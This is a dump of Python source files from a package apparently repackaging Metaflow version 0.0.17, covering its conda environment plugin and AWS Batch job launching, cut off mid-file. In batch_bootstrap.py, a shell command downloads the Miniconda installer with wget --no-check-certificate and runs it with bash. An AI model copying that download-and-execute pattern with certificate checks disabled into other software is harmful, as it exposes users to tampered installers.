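# Note: the lock path does not include env_id, so a single lock file serializes
# all environment operations under this conda prefix.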
def _env_lock_file(self, env_id):
return os.path.join(self._info()['conda_prefix'], 'mf_env-creation.lock')
def _call_conda(self, args, architecture=None):
try:
return subprocess.check_output(
[self._bin] + args,
stderr = open(os.devnull, 'wb'),
env = dict(
os.environ,
**{
'CONDA_JSON': 'True',
'CONDA_SUBDIR': (architecture if architecture else ''),
'CONDA_USE_ONLY_TAR_BZ2': 'True'
})
).strip()
except subprocess.CalledProcessError as e:
try:
output = json.loads(e.output)
err = [output['error']]
for error in output.get('errors', []):
err.append(error['error'])
raise CondaException(err)
except (TypeError, ValueError) as ve:
pass
raise RuntimeError(
'command \'{cmd}\' returned error ({code}): {output}'
.format(cmd=e.cmd, code=e.returncode, output=e.output))
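# Simple file-based lock used to serialize conda environment creation and
# removal across concurrent processes.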
class CondaLock(object):
def __init__(self, lock, timeout=3600, delay=10):
self.lock = lock
self.locked = False
self.timeout = timeout
self.delay = delay
def _acquire(self):
start = time.time()
try:
os.makedirs(os.path.dirname(self.lock))
except OSError as x:
if x.errno != errno.EEXIST:
raise
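# Atomically create the lock file; O_EXCL makes os.open fail while another
# process holds the lock.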
while True:
try:
self.fd = os.open(self.lock, os.O_CREAT |
os.O_EXCL | os.O_RDWR)
self.locked = True
break
except OSError as e:
if e.errno != errno.EEXIST:
raise
if self.timeout is None:
raise CondaException(
'Could not acquire lock {}'.format(self.lock))
if (time.time() - start) >= self.timeout:
raise CondaException(
'Timeout occurred while acquiring lock {}'.format(self.lock))
time.sleep(self.delay)
def _release(self):
if self.locked:
os.close(self.fd)
os.unlink(self.lock)
self.locked = False
def __enter__(self):
if not self.locked:
self._acquire()
return self
def __exit__(self, type, value, traceback):
self.__del__()
def __del__(self):
self._release() | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/conda/conda.py | conda.py |
import collections
import os
import sys
from hashlib import sha1
from multiprocessing.dummy import Pool
import platform
import requests
import shutil
import tempfile
try:
from urlparse import urlparse
except:
from urllib.parse import urlparse
from metaflow.datastore.local import LocalDataStore
from metaflow.decorators import StepDecorator
from metaflow.environment import InvalidEnvironmentException
from metaflow.metadata import MetaDatum
from metaflow.metaflow_config import get_pinned_conda_libs, CONDA_PACKAGE_S3ROOT
from metaflow.util import get_metaflow_root
from metaflow.datatools import S3
from . import read_conda_manifest, write_to_conda_manifest
from .conda import Conda
class CondaStepDecorator(StepDecorator):
"""
Conda decorator that sets the Conda environment for your step
To use, add this decorator to your step:
```
@conda
@step
def MyStep(self):
...
```
Settings specified in this decorator override any @conda_base flow-level decorator.
Parameters
----------
libraries : Dict
Libraries to use for this step. The key is the name of the package and the value
is the version to use. Defaults to {}
python : string
Version of Python to use (for example: '3.7.4'). Defaults to None
(will use the current python version)
disabled : bool
If set to True, disables Conda. Defaults to False
"""
name = 'conda'
defaults = {'libraries': {},
'python': None,
'disabled': None}
conda = None
environments = None
def _get_base_attributes(self):
if 'conda_base' in self.flow._flow_decorators:
return self.flow._flow_decorators['conda_base'].attributes
return self.defaults
def _python_version(self):
return next(x for x in [
self.attributes['python'],
self.base_attributes['python'],
platform.python_version()] if x is not None)
def is_enabled(self):
return not next(x for x in [
self.attributes['disabled'],
self.base_attributes['disabled'],
False] if x is not None)
def _lib_deps(self):
deps = get_pinned_conda_libs()
base_deps = self.base_attributes['libraries']
deps.update(base_deps)
step_deps = self.attributes['libraries']
if isinstance(step_deps, collections.Mapping):
deps.update(step_deps)
return deps
def _step_deps(self):
deps = [b'python==%s' % self._python_version().encode()]
deps.extend(b'%s==%s' % (name.encode('ascii'), ver.encode('ascii'))
for name, ver in self._lib_deps().items())
return deps
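# The environment id encodes the flow name, the target architecture and a hash
# of the sorted dependency list, so identical dependency sets resolve to the
# same cached environment.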
def _env_id(self):
deps = self._step_deps()
return 'metaflow_%s_%s_%s' % (self.flow.name,
self.architecture,
sha1(b' '.join(sorted(deps))).hexdigest())
def _resolve_step_environment(self, ds_root, force=False):
env_id = self._env_id()
cached_deps = read_conda_manifest(ds_root, self.flow.name)
if CondaStepDecorator.conda is None:
CondaStepDecorator.conda = Conda()
CondaStepDecorator.environments = CondaStepDecorator.conda.environments(self.flow.name)
if force or env_id not in cached_deps or 'cache_urls' not in cached_deps[env_id]:
if force or env_id not in cached_deps:
deps = self._step_deps()
(exact_deps, urls, order) = \
self.conda.create(self.step, env_id, deps, architecture=self.architecture)
payload = {
'explicit': exact_deps,
'deps': [d.decode('ascii') for d in deps],
'urls': urls,
'order': order
}
else:
payload = cached_deps[env_id]
if self.datastore.TYPE == 's3' and 'cache_urls' not in payload:
payload['cache_urls'] = self._cache_env()
write_to_conda_manifest(ds_root, self.flow.name, env_id, payload)
CondaStepDecorator.environments = CondaStepDecorator.conda.environments(self.flow.name)
return env_id
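# Cache the resolved conda package tarballs in S3 (under CONDA_PACKAGE_S3ROOT)
# so remote tasks can bootstrap the environment without contacting conda channels.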
def _cache_env(self):
def _download(entry):
url, local_path = entry
with requests.get(url, stream=True) as r:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
env_id = self._env_id()
files = []
to_download = []
for package_info in self.conda.package_info(env_id):
url = urlparse(package_info['url'])
path = os.path.join(CONDA_PACKAGE_S3ROOT,
url.netloc,
url.path.lstrip('/'),
package_info['md5'],
package_info['fn'])
# The tarball may be missing if the user has invoked `conda clean`.
tarball_path = package_info['package_tarball_full_path']
if os.path.isdir(package_info['package_tarball_full_path']):
tarball_path = '%s.tar.bz2' % package_info['package_tarball_full_path']
to_download.append((package_info['url'], tarball_path))
files.append((path, tarball_path))
if to_download:
Pool(8).map(_download, to_download)
with S3() as s3:
s3.put_files(files, overwrite=False)
return [s3_path for s3_path, _ in files]
def _prepare_step_environment(self, step_name, ds_root):
env_id = self._resolve_step_environment(ds_root)
if env_id not in CondaStepDecorator.environments:
cached_deps = read_conda_manifest(ds_root, self.flow.name)
self.conda.create(self.step,
env_id,
cached_deps[env_id]['urls'],
architecture=self.architecture,
explicit=True)
CondaStepDecorator.environments = CondaStepDecorator.conda.environments(self.flow.name)
return env_id
def _architecture(self, decos):
for deco in decos:
if deco.name == 'batch':
# force conda resolution for linux-64 architectures
return 'linux-64'
bit = '32'
if platform.machine().endswith('64'):
bit = '64'
if platform.system() == 'Linux':
return 'linux-%s' % bit
elif platform.system() == 'Darwin':
return 'osx-%s' % bit
else:
raise InvalidEnvironmentException('The *@conda* decorator is not supported '
'outside of Linux and Darwin platforms')
def runtime_init(self, flow, graph, package, run_id):
# Create a symlink to installed version of metaflow to execute user code against
path_to_metaflow = os.path.join(get_metaflow_root(), 'metaflow')
self.metaflow_home = tempfile.mkdtemp(dir='/tmp')
os.symlink(path_to_metaflow, os.path.join(self.metaflow_home, 'metaflow'))
def step_init(self, flow, graph, step, decos, environment, datastore, logger):
if environment.TYPE != 'conda':
raise InvalidEnvironmentException('The *@conda* decorator requires '
'--environment=conda')
def _logger(line, **kwargs):
logger(line)
self.local_root = LocalDataStore.get_datastore_root_from_config(_logger)
environment.set_local_root(self.local_root)
self.architecture = self._architecture(decos)
self.step = step
self.flow = flow
self.datastore = datastore
self.base_attributes = self._get_base_attributes()
def package_init(self, flow, step, environment):
if self.is_enabled():
self._prepare_step_environment(step, self.local_root)
def runtime_task_created(self, datastore, task_id, split_index, input_paths, is_cloned):
if self.is_enabled():
self.env_id = self._prepare_step_environment(self.step, self.local_root)
def task_pre_step(
self, step_name, ds, meta, run_id, task_id, flow, graph, retry_count, max_retries):
meta.register_metadata(run_id, step_name, task_id,
[MetaDatum(field='conda_env_id',
value=self._env_id(),
type='conda_env_id')])
def runtime_step_cli(self, cli_args, retry_count, max_user_code_retries):
if self.is_enabled() and 'batch' not in cli_args.commands:
python_path = self.metaflow_home
if os.environ.get('PYTHONPATH') is not None:
python_path = os.pathsep.join([os.environ['PYTHONPATH'], python_path])
cli_args.env['PYTHONPATH'] = python_path
cli_args.env['_METAFLOW_CONDA_ENV'] = self.env_id
cli_args.entrypoint[0] = self.conda.python(self.env_id)
def runtime_finished(self, exception):
shutil.rmtree(self.metaflow_home) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/conda/conda_step_decorator.py | conda_step_decorator.py |
import functools
import json
from multiprocessing import Pool
import os
import tarfile
import shutil
import subprocess
import sys
from metaflow.datatools import S3
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR
from . import CONDA_MAGIC_FILE
def bootstrap_environment(flow_name, env_id):
setup_conda_manifest(flow_name)
packages = download_conda_packages(flow_name, env_id)
install_conda_environment(env_id, packages)
def setup_conda_manifest(flow_name):
manifest_folder = os.path.join(os.getcwd(), DATASTORE_LOCAL_DIR, flow_name)
if not os.path.exists(manifest_folder):
os.makedirs(manifest_folder)
shutil.move(os.path.join(os.getcwd(), CONDA_MAGIC_FILE),
os.path.join(manifest_folder, CONDA_MAGIC_FILE))
def download_conda_packages(flow_name, env_id):
pkgs_folder = os.path.join(os.getcwd(), 'pkgs')
if not os.path.exists(pkgs_folder):
os.makedirs(pkgs_folder)
manifest_folder = os.path.join(os.getcwd(), DATASTORE_LOCAL_DIR, flow_name)
with open(os.path.join(manifest_folder, CONDA_MAGIC_FILE)) as f:
env = json.load(f)[env_id]
with S3() as s3:
for pkg in s3.get_many(env['cache_urls']):
shutil.move(pkg.path, os.path.join(pkgs_folder, os.path.basename(pkg.key)))
return env['order']
def install_conda_environment(env_id, packages):
args = [
'if ! type conda >/dev/null 2>&1; \
then wget --no-check-certificate https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh >/dev/null 2>&1; \
bash ~/miniconda.sh -b -p {0} >/dev/null 2>&1; \
export PATH=$PATH:{0}/bin; fi'.format(os.path.join(os.getcwd(), 'conda')),
'cd {0}'.format(os.path.join(os.getcwd(), 'pkgs')),
'conda create --yes --no-default-packages -p {0} --no-deps {1} >/dev/null 2>&1'.format(os.path.join(os.getcwd(), env_id), ' '.join(packages)),
'cd {0}'.format(os.getcwd())
]
os.system(' && '.join(args))
if __name__ == '__main__':
bootstrap_environment(sys.argv[1], sys.argv[2]) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/conda/batch_bootstrap.py | batch_bootstrap.py |
import os
import time
import json
import select
import atexit
import shlex
import time
import warnings
from requests.exceptions import HTTPError
from metaflow.exception import MetaflowException, MetaflowInternalError
from metaflow.metaflow_config import BATCH_METADATA_SERVICE_URL, DATATOOLS_S3ROOT, \
DATASTORE_LOCAL_DIR, DATASTORE_SYSROOT_S3, DEFAULT_METADATA, METADATA_SERVICE_HEADERS
from metaflow import util
from .batch_client import BatchClient
class BatchException(MetaflowException):
headline = 'Batch error'
class BatchKilledException(MetaflowException):
headline = 'Batch task killed'
class Batch(object):
def __init__(self, metadata, environment):
self.metadata = metadata
self.environment = environment
self._client = BatchClient()
atexit.register(lambda : self.job.kill() if hasattr(self, 'job') else None)
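# Assemble the shell command executed inside the container: code package
# download, environment bootstrap, then the step CLI, joined with '&&' so
# any failure aborts the task.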
def _command(self, code_package_url, environment, step_name, step_cli):
cmds = environment.get_package_commands(code_package_url)
cmds.extend(environment.bootstrap_commands(step_name))
cmds.append("echo 'Task is starting.'")
cmds.extend(step_cli)
return shlex.split('/bin/sh -c "%s"' % " && ".join(cmds))
def _search_jobs(self, flow_name, run_id, user):
if user is None:
regex = '-{flow_name}-{run_id}-'.format(flow_name=flow_name, run_id=run_id)
else:
regex = '{user}-{flow_name}-{run_id}-'.format(
user=user, flow_name=flow_name, run_id=run_id
)
jobs = []
for job in self._client.unfinished_jobs():
if regex in job['jobName']:
jobs.append(job)
return jobs
def _job_name(self, user, flow_name, run_id, step_name, task_id, retry_count):
return '{user}-{flow_name}-{run_id}-{step_name}-{task_id}-{retry_count}'.format(
user=user,
flow_name=flow_name,
run_id=run_id,
step_name=step_name,
task_id=task_id,
retry_count=retry_count,
)
def list_jobs(self, flow_name, run_id, user, echo):
jobs = self._search_jobs(flow_name, run_id, user)
if jobs:
for job in jobs:
echo(
'{name} [{id}] ({status})'.format(
name=job['jobName'], id=job['jobId'], status=job['status']
)
)
else:
echo('No running Batch jobs found.')
def kill_jobs(self, flow_name, run_id, user, echo):
jobs = self._search_jobs(flow_name, run_id, user)
if jobs:
for job in jobs:
try:
self._client.attach_job(job['jobId']).kill()
echo(
'Killing Batch job: {name} [{id}] ({status})'.format(
name=job['jobName'], id=job['jobId'], status=job['status']
)
)
except Exception as e:
echo(
'Failed to terminate Batch job %s [%s]'
% (job['jobId'], repr(e))
)
else:
echo('No running Batch jobs found.')
def launch_job(
self,
step_name,
step_cli,
code_package_sha,
code_package_url,
code_package_ds,
image,
queue,
iam_role=None,
cpu=None,
gpu=None,
memory=None,
run_time_limit=None,
env={},
attrs={},
):
job_name = self._job_name(
attrs['metaflow.user'],
attrs['metaflow.flow_name'],
attrs['metaflow.run_id'],
attrs['metaflow.step_name'],
attrs['metaflow.task_id'],
attrs['metaflow.retry_count'],
)
if queue is None:
queue = next(self._client.active_job_queues(), None)
if queue is None:
raise BatchException(
'Unable to launch Batch job. No job queue '
'specified and no valid & enabled queue found.'
)
job = self._client.job()
job \
.job_name(job_name) \
.job_queue(queue) \
.command(
self._command(code_package_url,
self.environment, step_name, [step_cli])) \
.image(image) \
.iam_role(iam_role) \
.cpu(cpu) \
.gpu(gpu) \
.memory(memory) \
.timeout_in_secs(run_time_limit) \
.environment_variable('METAFLOW_CODE_SHA', code_package_sha) \
.environment_variable('METAFLOW_CODE_URL', code_package_url) \
.environment_variable('METAFLOW_CODE_DS', code_package_ds) \
.environment_variable('METAFLOW_USER', attrs['metaflow.user']) \
.environment_variable('METAFLOW_SERVICE_URL', BATCH_METADATA_SERVICE_URL) \
.environment_variable('METAFLOW_SERVICE_HEADERS', json.dumps(METADATA_SERVICE_HEADERS)) \
.environment_variable('METAFLOW_DATASTORE_SYSROOT_LOCAL', DATASTORE_LOCAL_DIR) \
.environment_variable('METAFLOW_DATASTORE_SYSROOT_S3', DATASTORE_SYSROOT_S3) \
.environment_variable('METAFLOW_DATATOOLS_S3ROOT', DATATOOLS_S3ROOT) \
.environment_variable('METAFLOW_DEFAULT_DATASTORE', 's3') \
.environment_variable('METAFLOW_DEFAULT_METADATA', DEFAULT_METADATA)
for name, value in env.items():
job.environment_variable(name, value)
for name, value in self.metadata.get_runtime_environment('batch').items():
job.environment_variable(name, value)
if attrs:
for key, value in attrs.items():
job.parameter(key, value)
self.job = job.execute()
def wait(self, echo=None):
def wait_for_launch(job):
status = job.status
echo(job.id, 'Task is starting (status %s)...' % status)
t = time.time()
while True:
if status != job.status or (time.time()-t) > 30:
status = job.status
echo(
self.job.id,
'Task is starting (status %s)...' % status
)
t = time.time()
if self.job.is_running or self.job.is_done or self.job.is_crashed:
break
select.poll().poll(200)
def print_all(tail):
for line in tail:
if line:
echo(self.job.id, util.to_unicode(line))
else:
return tail, False
return tail, True
wait_for_launch(self.job)
logs = self.job.logs()
while True:
logs, finished = print_all(logs)
if finished:
break
else:
select.poll().poll(500)
if self.job.is_crashed:
if self.job.reason:
raise BatchException(
'Task crashed due to %s. '
'This could be a transient error. '
'Use @retry to retry.' % self.job.reason
)
raise BatchException(
'Task crashed. '
'This could be a transient error. '
'Use @retry to retry.'
)
else:
if self.job.is_running:
# Kill the job if it is still running by throwing an exception.
raise BatchException("Task failed!")
echo(
self.job.id,
'Task finished with exit code %s.' % self.job.status_code
) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/aws/batch/batch.py | batch.py |
import os
import sys
import tarfile
import time
import traceback
import click
from distutils.dir_util import copy_tree
from .batch import Batch, BatchKilledException
from metaflow.datastore import MetaflowDataStore
from metaflow.datastore.local import LocalDataStore
from metaflow.datastore.util.s3util import get_s3_client
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR
from metaflow import util
from metaflow.exception import (
CommandException,
METAFLOW_EXIT_DISALLOW_RETRY,
)
try:
# python2
from urlparse import urlparse
except: # noqa E722
# python3
from urllib.parse import urlparse
@click.group()
def cli():
pass
@cli.group(help="Commands related to Batch.")
def batch():
pass
def _execute_cmd(func, flow_name, run_id, user, my_runs, echo):
if user and my_runs:
raise CommandException("--user and --my-runs are mutually exclusive")
if run_id and my_runs:
raise CommandException("--run_id and --my-runs are mutually exclusive")
if my_runs:
user = util.get_username()
latest_run = False
if user and not run_id:
latest_run = True
if not run_id and latest_run:
run_id = util.get_latest_run_id(echo, flow_name)
if run_id is None:
raise CommandException("A previous run id was not found. Specify --run-id.")
func(flow_name, run_id, user, echo)
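# When running with the local metadata provider, pull the metadata tarball that
# the Batch task uploaded to S3 and merge it into the local metadata store.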
def _sync_metadata(echo, metadata, datastore_root, attempt):
if metadata.TYPE == 'local':
def echo_none(*args, **kwargs):
pass
path = os.path.join(
datastore_root,
MetaflowDataStore.filename_with_attempt_prefix('metadata.tgz', attempt))
url = urlparse(path)
bucket = url.netloc
key = url.path.lstrip('/')
s3, err = get_s3_client()
try:
s3.head_object(Bucket=bucket, Key=key)
# If we are here, we can download the object
with util.TempDir() as td:
tar_file_path = os.path.join(td, 'metadata.tgz')
with open(tar_file_path, 'wb') as f:
s3.download_fileobj(bucket, key, f)
with tarfile.open(tar_file_path, 'r:gz') as tar:
tar.extractall(td)
copy_tree(
os.path.join(td, DATASTORE_LOCAL_DIR),
LocalDataStore.get_datastore_root_from_config(echo_none),
update=True)
except err as e: # noqa F841
pass
@batch.command(help="List running Batch tasks of this flow")
@click.option(
"--my-runs", default=False, is_flag=True, help="Run the command over all tasks."
)
@click.option("--user", default=None, help="List tasks for the given user.")
@click.option("--run-id", default=None, help="List tasks corresponding to the run id.")
@click.pass_context
def list(ctx, run_id, user, my_runs):
batch = Batch(ctx.obj.metadata, ctx.obj.environment)
_execute_cmd(
batch.list_jobs, ctx.obj.flow.name, run_id, user, my_runs, ctx.obj.echo
)
@batch.command(help="Terminate running Batch tasks of this flow.")
@click.option("--my-runs", default=False, is_flag=True, help="Kill all running tasks.")
@click.option("--user", default=None, help="List tasks for the given user.")
@click.option(
"--run-id", default=None, help="Terminate tasks corresponding to the run id."
)
@click.pass_context
def kill(ctx, run_id, user, my_runs):
batch = Batch(ctx.obj.metadata, ctx.obj.environment)
_execute_cmd(
batch.kill_jobs, ctx.obj.flow.name, run_id, user, my_runs, ctx.obj.echo
)
@batch.command(
help="Execute a single task using Batch. This command "
"calls the top-level step command inside a Batch "
"job with the given options. Typically you do not "
"call this command directly; it is used internally "
"by Metaflow."
)
@click.argument("step-name")
@click.argument("code-package-sha")
@click.argument("code-package-url")
@click.option("--executable", help="Executable requirement for Batch.")
@click.option(
"--image", help="Docker image requirement for Batch. In name:version format."
)
@click.option(
"--iam_role", help="IAM role requirement for Batch"
)
@click.option("--cpu", help="CPU requirement for Batch.")
@click.option("--gpu", help="GPU requirement for Batch.")
@click.option("--memory", help="Memory requirement for Batch.")
@click.option("--queue", help="Job execution queue for Batch.")
@click.option("--run-id", help="Passed to the top-level 'step'.")
@click.option("--task-id", help="Passed to the top-level 'step'.")
@click.option("--input-paths", help="Passed to the top-level 'step'.")
@click.option("--split-index", help="Passed to the top-level 'step'.")
@click.option("--clone-path", help="Passed to the top-level 'step'.")
@click.option("--clone-run-id", help="Passed to the top-level 'step'.")
@click.option(
"--tag", multiple=True, default=None, help="Passed to the top-level 'step'."
)
@click.option("--namespace", default=None, help="Passed to the top-level 'step'.")
@click.option("--retry-count", default=0, help="Passed to the top-level 'step'.")
@click.option(
"--max-user-code-retries", default=0, help="Passed to the top-level 'step'."
)
@click.option(
"--run-time-limit",
default=5 * 24 * 60 * 60,
help="Run time limit in seconds for the Batch job. " "Default is 5 days.",
)
@click.pass_context
def step(
ctx,
step_name,
code_package_sha,
code_package_url,
executable=None,
image=None,
iam_role=None,
cpu=None,
gpu=None,
memory=None,
queue=None,
run_time_limit=None,
**kwargs
):
def echo(batch_id, msg, stream=sys.stdout):
ctx.obj.echo_always("[%s] %s" % (batch_id, msg))
if ctx.obj.datastore.datastore_root is None:
ctx.obj.datastore.datastore_root = ctx.obj.datastore.get_datastore_root_from_config(echo)
if executable is None:
executable = ctx.obj.environment.executable(step_name)
entrypoint = "%s -u %s" % (executable, os.path.basename(sys.argv[0]))
top_args = " ".join(util.dict_to_cli_options(ctx.parent.parent.params))
input_paths = kwargs.get("input_paths")
split_vars = None
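# Long input-path lists are split into several environment variables and
# reassembled in the step command, presumably to stay within AWS limits on
# the size of a single container override value.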
if input_paths:
max_size = 30 * 1024
split_vars = {
"METAFLOW_INPUT_PATHS_%d" % (i // max_size): input_paths[i : i + max_size]
for i in range(0, len(input_paths), max_size)
}
kwargs["input_paths"] = "".join("${%s}" % s for s in split_vars.keys())
step_args = " ".join(util.dict_to_cli_options(kwargs))
step_cli = u"{entrypoint} {top_args} step {step} {step_args}".format(
entrypoint=entrypoint, top_args=top_args, step=step_name, step_args=step_args
)
node = ctx.obj.graph[step_name]
# Get retry information
retry_count = kwargs.get("retry_count", 0)
retry_deco = [deco for deco in node.decorators if deco.name == "retry"]
minutes_between_retries = None
if retry_deco:
minutes_between_retries = int(
retry_deco[0].attributes.get("minutes_between_retries", 1)
)
# Set batch attributes
attrs = {
"metaflow.user": util.get_username(),
"metaflow.flow_name": ctx.obj.flow.name,
"metaflow.step_name": step_name,
"metaflow.run_id": kwargs["run_id"],
"metaflow.task_id": kwargs["task_id"],
"metaflow.retry_count": str(retry_count),
"metaflow.version": ctx.obj.environment.get_environment_info()[
"metaflow_version"
],
}
env_deco = [deco for deco in node.decorators if deco.name == "environment"]
if env_deco:
env = env_deco[0].attributes["vars"]
else:
env = {}
datastore_root = os.path.join(ctx.obj.datastore.make_path(
ctx.obj.flow.name, kwargs['run_id'], step_name, kwargs['task_id']))
# Add the environment variables related to the input-paths argument
if split_vars:
env.update(split_vars)
if retry_count:
ctx.obj.echo_always(
"Sleeping %d minutes before the next Batch retry" % minutes_between_retries
)
time.sleep(minutes_between_retries * 60)
batch = Batch(ctx.obj.metadata, ctx.obj.environment)
try:
with ctx.obj.monitor.measure("metaflow.batch.launch"):
batch.launch_job(
step_name,
step_cli,
code_package_sha,
code_package_url,
ctx.obj.datastore.TYPE,
image=image,
queue=queue,
iam_role=iam_role,
cpu=cpu,
gpu=gpu,
memory=memory,
run_time_limit=run_time_limit,
env=env,
attrs=attrs,
)
except Exception as e:
print(e)
_sync_metadata(echo, ctx.obj.metadata, datastore_root, retry_count)
sys.exit(METAFLOW_EXIT_DISALLOW_RETRY)
try:
batch.wait(echo=echo)
except BatchKilledException:
# don't retry killed tasks
traceback.print_exc()
_sync_metadata(echo, ctx.obj.metadata, datastore_root, retry_count)
sys.exit(METAFLOW_EXIT_DISALLOW_RETRY)
_sync_metadata(echo, ctx.obj.metadata, datastore_root, retry_count) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/aws/batch/batch_cli.py | batch_cli.py |
from collections import defaultdict, deque
import select
import sys
import time
import hashlib
try:
unicode
except NameError:
unicode = str
basestring = str
from metaflow.exception import MetaflowException
from metaflow.metaflow_config import get_authenticated_boto3_client
class BatchClient(object):
def __init__(self):
self._client = get_authenticated_boto3_client('batch')
def active_job_queues(self):
paginator = self._client.get_paginator('describe_job_queues')
return (
queue['jobQueueName']
for page in paginator.paginate()
for queue in page['jobQueues']
if queue['state'] == 'ENABLED' and queue['status'] == 'VALID'
)
def unfinished_jobs(self):
queues = self.active_job_queues()
return (
job
for queue in queues
for status in ['SUBMITTED', 'PENDING', 'RUNNABLE', 'STARTING', 'RUNNING']
for page in self._client.get_paginator('list_jobs').paginate(
jobQueue=queue, jobStatus=status
)
for job in page['jobSummaryList']
)
def job(self):
return BatchJob(self._client)
def attach_job(self, job_id):
job = RunningJob(job_id, self._client)
return job.update()
class BatchJobException(MetaflowException):
headline = 'Batch job error'
class BatchJob(object):
def __init__(self, client):
self._client = client
tree = lambda: defaultdict(tree)
self.payload = tree()
def execute(self):
if self._image is None:
raise BatchJobException(
'Unable to launch Batch job. No docker image specified.'
)
if self._iam_role is None:
raise BatchJobException(
'Unable to launch Batch job. No IAM role specified.'
)
self.payload['jobDefinition'] = self._job_def_arn(self._image, self._iam_role)
response = self._client.submit_job(**self.payload)
job = RunningJob(response['jobId'], self._client)
return job.update()
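# Job definitions are reused across runs: the definition name is a hash of
# (image, IAM role), and an existing ACTIVE definition is looked up before
# registering a new one.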
def _job_def_arn(self, image, job_role):
def_name = 'metaflow_%s' % hashlib.sha224((image + job_role).encode('utf-8')).hexdigest()
payload = {'jobDefinitionName': def_name, 'status': 'ACTIVE'}
response = self._client.describe_job_definitions(**payload)
if len(response['jobDefinitions']) > 0:
return response['jobDefinitions'][0]['jobDefinitionArn']
payload = {
'jobDefinitionName': def_name,
'type': 'container',
'containerProperties': {
'image': image,
'jobRoleArn': job_role,
'command': ['echo', 'hello world'],
'memory': 4000,
'vcpus': 1,
},
}
response = self._client.register_job_definition(**payload)
return response['jobDefinitionArn']
def job_name(self, job_name):
self.payload['jobName'] = job_name
return self
def job_queue(self, job_queue):
self.payload['jobQueue'] = job_queue
return self
def image(self, image):
self._image = image
return self
def iam_role(self, iam_role):
self._iam_role = iam_role
return self
def command(self, command):
if 'command' not in self.payload['containerOverrides']:
self.payload['containerOverrides']['command'] = []
self.payload['containerOverrides']['command'].extend(command)
return self
def cpu(self, cpu):
if not (isinstance(cpu, (int, unicode, basestring)) and int(cpu) > 0):
raise BatchJobException(
'Invalid CPU value ({}); it should be greater than 0'.format(cpu))
self.payload['containerOverrides']['vcpus'] = int(cpu)
return self
def memory(self, mem):
if not (isinstance(mem, (int, unicode, basestring)) and int(mem) > 0):
raise BatchJobException(
'Invalid memory value ({}); it should be greater than 0'.format(mem))
self.payload['containerOverrides']['memory'] = int(mem)
return self
def gpu(self, gpu):
if not (isinstance(gpu, (int, unicode, basestring))):
raise BatchJobException(
'Invalid GPU value ({}); it should be 0 or greater'.format(gpu))
if int(gpu) > 0:
if 'resourceRequirements' not in self.payload['containerOverrides']:
self.payload['containerOverrides']['resourceRequirements'] = []
self.payload['containerOverrides']['resourceRequirements'].append(
{'type': 'GPU', 'value': str(gpu)}
)
return self
def environment_variable(self, name, value):
if 'environment' not in self.payload['containerOverrides']:
self.payload['containerOverrides']['environment'] = []
self.payload['containerOverrides']['environment'].append(
{'name': name, 'value': str(value)}
)
return self
def timeout_in_secs(self, timeout_in_secs):
self.payload['timeout']['attemptDurationSeconds'] = timeout_in_secs
return self
def parameter(self, key, value):
self.payload['parameters'][key] = str(value)
return self
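# Decorator that rate-limits calls to the wrapped function to at most once per
# delta_in_secs; used below to throttle describe_jobs polling.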
class limit(object):
def __init__(self, delta_in_secs):
self.delta_in_secs = delta_in_secs
self._now = None
def __call__(self, func):
def wrapped(*args, **kwargs):
now = time.time()
if self._now is None or (now - self._now > self.delta_in_secs):
func(*args, **kwargs)
self._now = now
return wrapped
class RunningJob(object):
NUM_RETRIES = 5
def __init__(self, id, client):
self._id = id
self._client = client
self._data = {}
def __repr__(self):
return '{}(\'{}\')'.format(self.__class__.__name__, self._id)
def _apply(self, data):
self._data = data
@limit(1)
def _update(self):
try:
data = self._client.describe_jobs(jobs=[self._id])
except self._client.exceptions.ClientException:
return
self._apply(data['jobs'][0])
def update(self):
self._update()
return self
@property
def id(self):
return self._id
@property
def info(self):
if not self._data:
self.update()
return self._data
@property
def job_name(self):
return self.info['jobName']
@property
def job_queue(self):
return self.info['jobQueue']
@property
def status(self):
if not self.is_done:
self.update()
return self.info['status']
@property
def status_reason(self):
return self.info.get('statusReason')
@property
def created_at(self):
return self.info['createdAt']
@property
def stopped_at(self):
return self.info.get('stoppedAt', 0)
@property
def is_done(self):
if self.stopped_at == 0:
self.update()
return self.stopped_at > 0
@property
def is_running(self):
return self.status == 'RUNNING'
@property
def is_successful(self):
return self.status == 'SUCCEEDED'
@property
def is_crashed(self):
# TODO: Check statusmessage to find if the job crashed instead of failing
return self.status == 'FAILED'
@property
def reason(self):
return self.info['container'].get('reason')
@property
def status_code(self):
if not self.is_done:
self.update()
return self.info['container'].get('exitCode')
def wait_for_running(self):
if not self.is_running and not self.is_done:
BatchWaiter(self._client).wait_for_running(self.id)
@property
def log_stream_name(self):
return self.info['container'].get('logStreamName')
def logs(self):
def get_log_stream(job):
log_stream_name = job.log_stream_name
if log_stream_name:
return BatchLogs('/aws/batch/job', log_stream_name, sleep_on_no_data=1)
else:
return None
log_stream = None
while True:
if self.is_running or self.is_done:
log_stream = get_log_stream(self)
break
elif not self.is_done:
self.wait_for_running()
for i in range(self.NUM_RETRIES):
try:
check_after_done = 0
for line in log_stream:
if not line:
if self.is_done:
if check_after_done > 1:
return
check_after_done += 1
else:
pass
else:
yield line
except Exception as ex:
last_exc = ex
if self.is_crashed:
break
sys.stderr.write(repr(ex))
time.sleep(2 ** i)
def kill(self):
if not self.is_done:
self._client.terminate_job(
jobId=self._id, reason='Metaflow initiated job termination.'
)
return self.update()
class BatchWaiter(object):
def __init__(self, client):
try:
from botocore import waiter
except:
raise BatchJobException(
'Could not import module \'botocore\' which '
'is required for Batch jobs. Install botocore '
'first.'
)
self._client = client
self._waiter = waiter
def wait_for_running(self, job_id):
model = self._waiter.WaiterModel(
{
'version': 2,
'waiters': {
'JobRunning': {
'delay': 1,
'operation': 'DescribeJobs',
'description': 'Wait until job starts running',
'maxAttempts': 1000000,
'acceptors': [
{
'argument': 'jobs[].status',
'expected': 'SUCCEEDED',
